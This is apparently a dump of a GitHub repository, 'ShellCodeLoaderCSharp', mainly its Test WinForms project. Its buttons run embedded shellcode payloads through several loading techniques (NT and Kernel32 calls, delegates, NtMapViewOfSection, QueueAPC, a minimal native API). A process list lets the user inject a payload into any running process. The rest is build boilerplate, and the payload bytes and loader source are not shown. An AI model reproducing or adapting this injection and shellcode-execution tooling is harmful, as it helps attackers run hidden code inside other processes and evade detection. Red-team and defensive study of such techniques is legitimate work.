https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.dll
--------------------------------------------------------------------------------
/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/ShellCodeLoader/obj/x64/Release/ShellCodeLoader.pdb
--------------------------------------------------------------------------------
/Test/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Test/Form1.Designer.cs:
--------------------------------------------------------------------------------
1 |
2 | namespace Test
3 | {
4 | partial class Form1
5 | {
6 | ///
7 | /// Variable nécessaire au concepteur.
8 | ///
9 | private System.ComponentModel.IContainer components = null;
10 |
11 | ///
12 | /// Nettoyage des ressources utilisées.
13 | ///
14 | /// true si les ressources managées doivent être supprimées ; sinon, false.
15 | protected override void Dispose(bool disposing)
16 | {
17 | if (disposing && (components != null))
18 | {
19 | components.Dispose();
20 | }
21 | base.Dispose(disposing);
22 | }
23 |
24 | #region Code généré par le Concepteur Windows Form
25 |
26 | ///
27 | /// Méthode requise pour la prise en charge du concepteur - ne modifiez pas
28 | /// le contenu de cette méthode avec l'éditeur de code.
29 | ///
30 | private void InitializeComponent()
31 | {
32 | this.components = new System.ComponentModel.Container();
33 | this.button1 = new System.Windows.Forms.Button();
34 | this.button2 = new System.Windows.Forms.Button();
35 | this.button3 = new System.Windows.Forms.Button();
36 | this.button4 = new System.Windows.Forms.Button();
37 | this.listView1 = new System.Windows.Forms.ListView();
38 | this.columnHeader1 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
39 | this.columnHeader2 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
40 | this.contextMenuStrip1 = new System.Windows.Forms.ContextMenuStrip(this.components);
41 | this.injectToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
42 | this.injectWithMapViewToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
43 | this.refreshToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
44 | this.button5 = new System.Windows.Forms.Button();
45 | this.button6 = new System.Windows.Forms.Button();
46 | this.button7 = new System.Windows.Forms.Button();
47 | this.contextMenuStrip1.SuspendLayout();
48 | this.SuspendLayout();
49 | //
50 | // button1
51 | //
52 | this.button1.Location = new System.Drawing.Point(12, 12);
53 | this.button1.Name = "button1";
54 | this.button1.Size = new System.Drawing.Size(121, 59);
55 | this.button1.TabIndex = 0;
56 | this.button1.Text = "NT";
57 | this.button1.UseVisualStyleBackColor = true;
58 | this.button1.Click += new System.EventHandler(this.button1_Click);
59 | //
60 | // button2
61 | //
62 | this.button2.Location = new System.Drawing.Point(149, 12);
63 | this.button2.Name = "button2";
64 | this.button2.Size = new System.Drawing.Size(121, 59);
65 | this.button2.TabIndex = 1;
66 | this.button2.Text = "Kernel32";
67 | this.button2.UseVisualStyleBackColor = true;
68 | this.button2.Click += new System.EventHandler(this.button2_Click);
69 | //
70 | // button3
71 | //
72 | this.button3.Location = new System.Drawing.Point(12, 89);
73 | this.button3.Name = "button3";
74 | this.button3.Size = new System.Drawing.Size(121, 59);
75 | this.button3.TabIndex = 2;
76 | this.button3.Text = "NT Delegates";
77 | this.button3.UseVisualStyleBackColor = true;
78 | this.button3.Click += new System.EventHandler(this.button3_Click);
79 | //
80 | // button4
81 | //
82 | this.button4.Location = new System.Drawing.Point(149, 89);
83 | this.button4.Name = "button4";
84 | this.button4.Size = new System.Drawing.Size(121, 59);
85 | this.button4.TabIndex = 3;
86 | this.button4.Text = "Kernel32 Delegates";
87 | this.button4.UseVisualStyleBackColor = true;
88 | this.button4.Click += new System.EventHandler(this.button4_Click);
89 | //
90 | // listView1
91 | //
92 | this.listView1.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
93 | this.columnHeader1,
94 | this.columnHeader2});
95 | this.listView1.ContextMenuStrip = this.contextMenuStrip1;
96 | this.listView1.HideSelection = false;
97 | this.listView1.Location = new System.Drawing.Point(12, 171);
98 | this.listView1.Name = "listView1";
99 | this.listView1.Size = new System.Drawing.Size(443, 166);
100 | this.listView1.TabIndex = 4;
101 | this.listView1.UseCompatibleStateImageBehavior = false;
102 | this.listView1.View = System.Windows.Forms.View.Details;
103 | //
104 | // columnHeader1
105 | //
106 | this.columnHeader1.Text = "PID";
107 | //
108 | // columnHeader2
109 | //
110 | this.columnHeader2.Text = "Name";
111 | //
112 | // contextMenuStrip1
113 | //
114 | this.contextMenuStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
115 | this.injectToolStripMenuItem,
116 | this.injectWithMapViewToolStripMenuItem,
117 | this.refreshToolStripMenuItem});
118 | this.contextMenuStrip1.Name = "contextMenuStrip1";
119 | this.contextMenuStrip1.Size = new System.Drawing.Size(184, 70);
120 | //
121 | // injectToolStripMenuItem
122 | //
123 | this.injectToolStripMenuItem.Name = "injectToolStripMenuItem";
124 | this.injectToolStripMenuItem.Size = new System.Drawing.Size(183, 22);
125 | this.injectToolStripMenuItem.Text = "Inject";
126 | this.injectToolStripMenuItem.Click += new System.EventHandler(this.injectToolStripMenuItem_Click);
127 | //
128 | // injectWithMapViewToolStripMenuItem
129 | //
130 | this.injectWithMapViewToolStripMenuItem.Name = "injectWithMapViewToolStripMenuItem";
131 | this.injectWithMapViewToolStripMenuItem.Size = new System.Drawing.Size(183, 22);
132 | this.injectWithMapViewToolStripMenuItem.Text = "Inject With MapView";
133 | this.injectWithMapViewToolStripMenuItem.Click += new System.EventHandler(this.injectWithMapViewToolStripMenuItem_Click);
134 | //
135 | // refreshToolStripMenuItem
136 | //
137 | this.refreshToolStripMenuItem.Name = "refreshToolStripMenuItem";
138 | this.refreshToolStripMenuItem.Size = new System.Drawing.Size(183, 22);
139 | this.refreshToolStripMenuItem.Text = "Refresh";
140 | this.refreshToolStripMenuItem.Click += new System.EventHandler(this.refreshToolStripMenuItem_Click);
141 | //
142 | // button5
143 | //
144 | this.button5.Location = new System.Drawing.Point(294, 12);
145 | this.button5.Name = "button5";
146 | this.button5.Size = new System.Drawing.Size(121, 59);
147 | this.button5.TabIndex = 5;
148 | this.button5.Text = "Local MapView";
149 | this.button5.UseVisualStyleBackColor = true;
150 | this.button5.Click += new System.EventHandler(this.button5_Click);
151 | //
152 | // button6
153 | //
154 | this.button6.Location = new System.Drawing.Point(294, 89);
155 | this.button6.Name = "button6";
156 | this.button6.Size = new System.Drawing.Size(121, 59);
157 | this.button6.TabIndex = 6;
158 | this.button6.Text = "Local QueueAPC";
159 | this.button6.UseVisualStyleBackColor = true;
160 | this.button6.Click += new System.EventHandler(this.button6_Click);
161 | //
162 | // button7
163 | //
164 | this.button7.Location = new System.Drawing.Point(436, 12);
165 | this.button7.Name = "button7";
166 | this.button7.Size = new System.Drawing.Size(121, 59);
167 | this.button7.TabIndex = 7;
168 | this.button7.Text = "Minimal API";
169 | this.button7.UseVisualStyleBackColor = true;
170 | this.button7.Click += new System.EventHandler(this.button7_Click);
171 | //
172 | // Form1
173 | //
174 | this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
175 | this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
176 | this.ClientSize = new System.Drawing.Size(569, 356);
177 | this.Controls.Add(this.button7);
178 | this.Controls.Add(this.button6);
179 | this.Controls.Add(this.button5);
180 | this.Controls.Add(this.listView1);
181 | this.Controls.Add(this.button4);
182 | this.Controls.Add(this.button3);
183 | this.Controls.Add(this.button2);
184 | this.Controls.Add(this.button1);
185 | this.Name = "Form1";
186 | this.Text = "Form1";
187 | this.contextMenuStrip1.ResumeLayout(false);
188 | this.ResumeLayout(false);
189 |
190 | }
191 |
192 | #endregion
193 |
194 | private System.Windows.Forms.Button button1;
195 | private System.Windows.Forms.Button button2;
196 | private System.Windows.Forms.Button button3;
197 | private System.Windows.Forms.Button button4;
198 | private System.Windows.Forms.ListView listView1;
199 | private System.Windows.Forms.ColumnHeader columnHeader1;
200 | private System.Windows.Forms.ColumnHeader columnHeader2;
201 | private System.Windows.Forms.ContextMenuStrip contextMenuStrip1;
202 | private System.Windows.Forms.ToolStripMenuItem injectToolStripMenuItem;
203 | private System.Windows.Forms.ToolStripMenuItem refreshToolStripMenuItem;
204 | private System.Windows.Forms.Button button5;
205 | private System.Windows.Forms.ToolStripMenuItem injectWithMapViewToolStripMenuItem;
206 | private System.Windows.Forms.Button button6;
207 | private System.Windows.Forms.Button button7;
208 | }
209 | }
210 |
211 |
--------------------------------------------------------------------------------
/Test/Form1.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.Windows.Forms;
4 | /*
5 | || AUTHOR Arsium ||
6 | || github : https://github.com/arsium ||
7 |
8 | Each payload has been converted using :
9 | -First donut : https://github.com/TheWover/donut to convert the payload to shellcode
10 | -Second HxD Editor : https://mh-nexus.de/en/downloads.php?product=HxD20 to get directly raw bytes exported to .cs
11 | */
12 | namespace Test
13 | {
14 | public partial class Form1 : Form
15 | {
16 | public Form1()
17 | {
18 | InitializeComponent();
19 | }
20 |
21 | private void button1_Click(object sender, EventArgs e)
22 | {
23 |
24 | //MessageBox.Show(Process.GetProcessById(33008).ProcessName);
25 | /*Process Target = Process.GetProcessesByName("ProcessHacker")[0];//notepad
26 | MessageBox.Show(Target.MainWindowTitle);
27 | ShellCodeLoader.ShellCodeLoaderEx cpp = new ShellCodeLoader.ShellCodeLoaderEx(Target, PayloadCpp64.rawData);
28 | cpp.LoadWithKernel32();
29 | cpp.LoadWithNT();
30 | cpp.Dispose();*/
31 |
32 | if (IntPtr.Size == 8)
33 | {
34 | ShellCodeLoader.ShellCodeLoader dlang = new ShellCodeLoader.ShellCodeLoader(Test.PayloadD_DLL_64.rawData);//Payload D_64 not working ?
35 | dlang.LoadWithNT();
36 | dlang.Dispose();
37 | ShellCodeLoader.ShellCodeLoader csharp = new ShellCodeLoader.ShellCodeLoader(Test.PayloadCSharp64.rawData);
38 | csharp.LoadWithNT();
39 | csharp.Dispose();
40 | }
41 | else
42 | {
43 | ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadD_DLL_32.rawData);
44 | cpp.Asynchronous = true;
45 | cpp.LoadWithNT();
46 | cpp.Dispose();
47 | ShellCodeLoader.ShellCodeLoader csharp = new ShellCodeLoader.ShellCodeLoader(PayloadCSharp32.rawData);
48 | csharp.LoadWithNT();
49 | csharp.Dispose();
50 | }
51 | }
52 |
53 | private void injectToolStripMenuItem_Click(object sender, EventArgs e)
54 | {
55 | Process Target = Process.GetProcessesByName(listView1.SelectedItems[0].SubItems[1].Text)[0];
56 | // MessageBox.Show(Target.MainWindowTitle);
57 | ShellCodeLoader.ShellCodeLoaderEx cpp = new ShellCodeLoader.ShellCodeLoaderEx(Target, PayloadCpp64.rawData);
58 | cpp.LoadWithNT();
59 | cpp.Dispose();
60 | //ShellCodeLoader.ShellCodeLoaderEx csharp = new ShellCodeLoader.ShellCodeLoaderEx(Target, PayloadCSharp64.rawData);
61 | //csharp.LoadWithNT();
62 | //csharp.Dispose();
63 | }
64 |
65 | private void button2_Click(object sender, EventArgs e)
66 | {
67 | if (IntPtr.Size == 8)
68 | {
69 | ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadCpp64.rawData);//same process
70 | cpp.LoadWithKernel32();
71 | cpp.Dispose();
72 | ShellCodeLoader.ShellCodeLoader csharp = new ShellCodeLoader.ShellCodeLoader(PayloadCSharp64.rawData);
73 | csharp.LoadWithKernel32();
74 | csharp.Dispose();
75 | }
76 | else
77 | {
78 | ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadCpp32.rawData);
79 | cpp.Asynchronous = true;
80 | cpp.LoadWithKernel32();
81 | cpp.Dispose();
82 | ShellCodeLoader.ShellCodeLoader csharp = new ShellCodeLoader.ShellCodeLoader(PayloadCSharp32.rawData);
83 | csharp.LoadWithKernel32();
84 | csharp.Dispose();
85 | }
86 | }
87 |
88 | private void button3_Click(object sender, EventArgs e)
89 | {
90 | if (IntPtr.Size == 8)
91 | {
92 | ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadCpp64.rawData);
93 | cpp.LoadWithNTDelegates();
94 | cpp.Dispose();
95 | ShellCodeLoader.ShellCodeLoader csharp = new ShellCodeLoader.ShellCodeLoader(PayloadCSharp64.rawData);
96 | csharp.LoadWithNTDelegates();
97 | csharp.Dispose();
98 | }
99 | else
100 | {
101 | ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadCpp32.rawData);
102 | cpp.Asynchronous = true;
103 | cpp.LoadWithNTDelegates();
104 | cpp.Dispose();
105 | ShellCodeLoader.ShellCodeLoader csharp = new ShellCodeLoader.ShellCodeLoader(PayloadCSharp32.rawData);
106 | csharp.LoadWithNTDelegates();
107 | csharp.Dispose();
108 | }
109 | }
110 |
111 | private void button4_Click(object sender, EventArgs e)
112 | {
113 | if (IntPtr.Size == 8)
114 | {
115 | ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadCpp64.rawData);
116 | cpp.LoadWithKernel32Delegates();
117 | cpp.Dispose();
118 | ShellCodeLoader.ShellCodeLoader csharp = new ShellCodeLoader.ShellCodeLoader(PayloadCSharp64.rawData);
119 | csharp.LoadWithKernel32Delegates();
120 | csharp.Dispose();
121 | }
122 | else
123 | {
124 | ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadCpp32.rawData);
125 | cpp.Asynchronous = true;
126 | cpp.LoadWithKernel32Delegates();
127 | cpp.Dispose();
128 | ShellCodeLoader.ShellCodeLoader csharp = new ShellCodeLoader.ShellCodeLoader(PayloadCSharp32.rawData);
129 | csharp.LoadWithKernel32Delegates();
130 | csharp.Dispose();
131 | }
132 | }
133 |
134 | private void refreshToolStripMenuItem_Click(object sender, EventArgs e)
135 | {
136 | listView1.Items.Clear();
137 | foreach (Process p in Process.GetProcesses())
138 | {
139 | ListViewItem I = new ListViewItem(p.Id.ToString());
140 | I.SubItems.Add(p.ProcessName);
141 | listView1.Items.Add(I);
142 | }
143 | }
144 |
145 | private void button5_Click(object sender, EventArgs e)
146 | {
147 | if (IntPtr.Size == 8)
148 | {
149 | ShellCodeLoader.MapView cpp = new ShellCodeLoader.MapView(PayloadCpp64.rawData);
150 | ShellCodeLoader.MapView csharp = new ShellCodeLoader.MapView(PayloadCSharp64.rawData);
151 | cpp.LoadWithNtMapView();
152 | csharp.LoadWithNtMapView();
153 | cpp.Dispose();
154 | csharp.Dispose();
155 | }
156 | else
157 | {
158 | ShellCodeLoader.MapView cpp = new ShellCodeLoader.MapView(PayloadCpp32.rawData);
159 | ShellCodeLoader.MapView csharp = new ShellCodeLoader.MapView(PayloadCSharp32.rawData);
160 | cpp.LoadWithNtMapView();
161 | csharp.LoadWithNtMapView();
162 | cpp.Dispose();
163 | csharp.Dispose();
164 | }
165 | }
166 |
167 |
168 | private void button6_Click(object sender, EventArgs e)
169 | {
170 | if (IntPtr.Size == 8)
171 | {
172 | ShellCodeLoader.QueueAPC cpp = new ShellCodeLoader.QueueAPC(PayloadCpp64.rawData);
173 | ShellCodeLoader.QueueAPC csharp = new ShellCodeLoader.QueueAPC(PayloadCSharp64.rawData, true);
174 | cpp.LoadWithQueueAPC();
175 | csharp.LoadWithQueueAPC();
176 | cpp.Dispose();
177 | csharp.Dispose();
178 | }
179 | else
180 | {
181 | ShellCodeLoader.QueueAPC cpp = new ShellCodeLoader.QueueAPC(PayloadCpp32.rawData, true);
182 | ShellCodeLoader.QueueAPC csharp = new ShellCodeLoader.QueueAPC(PayloadCSharp32.rawData, true);
183 | cpp.LoadWithQueueAPC();
184 | csharp.LoadWithQueueAPC();
185 | cpp.Dispose();
186 | csharp.Dispose();
187 | }
188 | }
189 |
190 | private void injectWithMapViewToolStripMenuItem_Click(object sender, EventArgs e)
191 | {
192 | Process Target = Process.GetProcessesByName(listView1.SelectedItems[0].SubItems[1].Text)[0];
193 | ShellCodeLoader.MapView cpp = new ShellCodeLoader.MapView(Target, PayloadCpp64.rawData);
194 | ShellCodeLoader.MapView csharp = new ShellCodeLoader.MapView(Target, PayloadCSharp64.rawData);
195 | cpp.LoadWithNtMapView();
196 | csharp.LoadWithNtMapView();
197 | cpp.Dispose();
198 | csharp.Dispose();
199 | }
200 |
201 | private void button7_Click(object sender, EventArgs e)
202 | {
203 | if (IntPtr.Size == 8)
204 | {
205 | ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI cpp = new ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI(PayloadCpp64.rawData);
206 | ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI csharp = new ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI(PayloadCSharp64.rawData);
207 | cpp.Asynchronous = true;
208 | csharp.Asynchronous = true;
209 | cpp.LoadWithMinimalAPI();
210 | csharp.LoadWithMinimalAPI();
211 | cpp.Dispose();
212 | csharp.Dispose();
213 | }
214 | else
215 | {
216 | ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI cpp = new ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI(PayloadCpp32.rawData);
217 | ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI csharp = new ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI(PayloadCSharp32.rawData);
218 | cpp.LoadWithMinimalAPI();
219 | csharp.LoadWithMinimalAPI();
220 | cpp.Dispose();
221 | csharp.Dispose();
222 | }
223 | }
224 | }
225 | }
226 |
--------------------------------------------------------------------------------
/Test/Form1.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
121 | 17, 17
122 |
123 |
--------------------------------------------------------------------------------
/Test/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Threading.Tasks;
5 | using System.Windows.Forms;
6 |
7 | namespace Test
8 | {
9 | static class Program
10 | {
11 | ///
12 | /// Point d'entrée principal de l'application.
13 | ///
14 | [STAThread]
15 | static void Main()
16 | {
17 | Application.EnableVisualStyles();
18 | Application.SetCompatibleTextRenderingDefault(false);
19 | Application.Run(new Form1());
20 | }
21 | }
22 | }
23 |
--------------------------------------------------------------------------------
/Test/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // Les informations générales relatives à un assembly dépendent de
6 | // l'ensemble d'attributs suivant. Changez les valeurs de ces attributs pour modifier les informations
7 | // associées à un assembly.
8 | [assembly: AssemblyTitle("Test")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Test")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // L'affectation de la valeur false à ComVisible rend les types invisibles dans cet assembly
18 | // aux composants COM. Si vous devez accéder à un type dans cet assembly à partir de
19 | // COM, affectez la valeur true à l'attribut ComVisible sur ce type.
20 | [assembly: ComVisible(false)]
21 |
22 | // Le GUID suivant est pour l'ID de la typelib si ce projet est exposé à COM
23 | [assembly: Guid("9b489ff7-a0fb-4813-96ad-b6d604da87fc")]
24 |
25 | // Les informations de version pour un assembly se composent des quatre valeurs suivantes :
26 | //
27 | // Version principale
28 | // Version secondaire
29 | // Numéro de build
30 | // Révision
31 | //
32 | // Vous pouvez spécifier toutes les valeurs ou indiquer les numéros de build et de révision par défaut
33 | // en utilisant '*', comme indiqué ci-dessous :
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Test/Properties/Resources.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // Ce code a été généré par un outil.
4 | // Version du runtime :4.0.30319.42000
5 | //
6 | // Les modifications apportées à ce fichier peuvent provoquer un comportement incorrect et seront perdues si
7 | // le code est régénéré.
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 |
12 | namespace Test.Properties
13 | {
14 | ///
15 | /// Une classe de ressource fortement typée destinée, entre autres, à la consultation des chaînes localisées.
16 | ///
17 | // Cette classe a été générée automatiquement par la classe StronglyTypedResourceBuilder
18 | // à l'aide d'un outil, tel que ResGen ou Visual Studio.
19 | // Pour ajouter ou supprimer un membre, modifiez votre fichier .ResX, puis réexécutez ResGen
20 | // avec l'option /str ou régénérez votre projet VS.
21 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
22 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
23 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
24 | internal class Resources
25 | {
26 |
27 | private static global::System.Resources.ResourceManager resourceMan;
28 |
29 | private static global::System.Globalization.CultureInfo resourceCulture;
30 |
31 | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
32 | internal Resources()
33 | {
34 | }
35 |
36 | ///
37 | /// Retourne l'instance ResourceManager mise en cache utilisée par cette classe.
38 | ///
39 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
40 | internal static global::System.Resources.ResourceManager ResourceManager
41 | {
42 | get
43 | {
44 | if ((resourceMan == null))
45 | {
46 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Test.Properties.Resources", typeof(Resources).Assembly);
47 | resourceMan = temp;
48 | }
49 | return resourceMan;
50 | }
51 | }
52 |
53 | ///
54 | /// Remplace la propriété CurrentUICulture du thread actuel pour toutes
55 | /// les recherches de ressources à l'aide de cette classe de ressource fortement typée.
56 | ///
57 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
58 | internal static global::System.Globalization.CultureInfo Culture
59 | {
60 | get
61 | {
62 | return resourceCulture;
63 | }
64 | set
65 | {
66 | resourceCulture = value;
67 | }
68 | }
69 | }
70 | }
71 |
--------------------------------------------------------------------------------
/Test/Properties/Resources.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 | text/microsoft-resx
107 |
108 |
109 | 2.0
110 |
111 |
112 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
113 |
114 |
115 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
--------------------------------------------------------------------------------
/Test/Properties/Settings.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // This code was generated by a tool.
4 | // Runtime Version:4.0.30319.42000
5 | //
6 | // Changes to this file may cause incorrect behavior and will be lost if
7 | // the code is regenerated.
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 |
12 | namespace Test.Properties
13 | {
14 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
15 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0")]
16 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase
17 | {
18 |
19 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings())));
20 |
21 | public static Settings Default
22 | {
23 | get
24 | {
25 | return defaultInstance;
26 | }
27 | }
28 | }
29 | }
30 |
--------------------------------------------------------------------------------
/Test/Properties/Settings.settings:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/Test/Test.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}
8 | WinExe
9 | Test
10 | Test
11 | v4.5
12 | 512
13 | true
14 |
15 |
16 | AnyCPU
17 | true
18 | full
19 | false
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 |
25 |
26 | AnyCPU
27 | pdbonly
28 | true
29 | bin\Release\
30 | TRACE
31 | prompt
32 | 4
33 |
34 |
35 | true
36 | bin\x64\Debug\
37 | DEBUG;TRACE
38 | full
39 | x64
40 | 7.3
41 | prompt
42 | true
43 |
44 |
45 | bin\x64\Release\
46 | TRACE
47 | true
48 | pdbonly
49 | x64
50 | 7.3
51 | prompt
52 | true
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 | Form
70 |
71 |
72 | Form1.cs
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 | Form1.cs
86 |
87 |
88 | ResXFileCodeGenerator
89 | Resources.Designer.cs
90 | Designer
91 |
92 |
93 | True
94 | Resources.resx
95 |
96 |
97 | SettingsSingleFileGenerator
98 | Settings.Designer.cs
99 |
100 |
101 | True
102 | Settings.settings
103 | True
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 | {b2a57a97-4d88-4942-a4b3-06aa466080f2}
112 | ShellCodeLoader
113 |
114 |
115 |
116 |
--------------------------------------------------------------------------------
/Test/obj/Debug/.NETFramework,Version=v4.5.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")]
5 |
--------------------------------------------------------------------------------
/Test/obj/Debug/DesignTimeResolveAssemblyReferences.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/Debug/DesignTimeResolveAssemblyReferences.cache
--------------------------------------------------------------------------------
/Test/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/Test/obj/Debug/Test.Form1.resources:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/Debug/Test.Form1.resources
--------------------------------------------------------------------------------
/Test/obj/Debug/Test.Properties.Resources.resources:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/Debug/Test.Properties.Resources.resources
--------------------------------------------------------------------------------
/Test/obj/Debug/Test.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/Debug/Test.csproj.AssemblyReference.cache
--------------------------------------------------------------------------------
/Test/obj/Debug/Test.csproj.CopyComplete:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/arsium/ShellCodeLoaderCSharp/b8f75144c1632484ead24afed6cf42e7a0d1a239/Test/obj/Debug/Test.csproj.CopyComplete
--------------------------------------------------------------------------------
/Test/obj/Debug/Test.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 4930b1b4417d56ca3c4138b912445e434851da0d
2 |
--------------------------------------------------------------------------------
/Test/obj/Debug/Test.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | F:\Personal\ShellCodeLoader\Test\bin\Debug\Test.exe.config
2 | F:\Personal\ShellCodeLoader\Test\bin\Debug\Test.exe
3 | F:\Personal\ShellCodeLoader\Test\bin\Debug\Test.pdb
4 | F:\Personal\ShellCodeLoader\Test\bin\Debug\ShellCodeLoader.dll
5 | F:\Personal\ShellCodeLoader\Test\bin\Debug\ShellCodeLoader.pdb
6 | F:\Personal\ShellCodeLoader\Test\obj\Debug\Test.csproj.AssemblyReference.cache
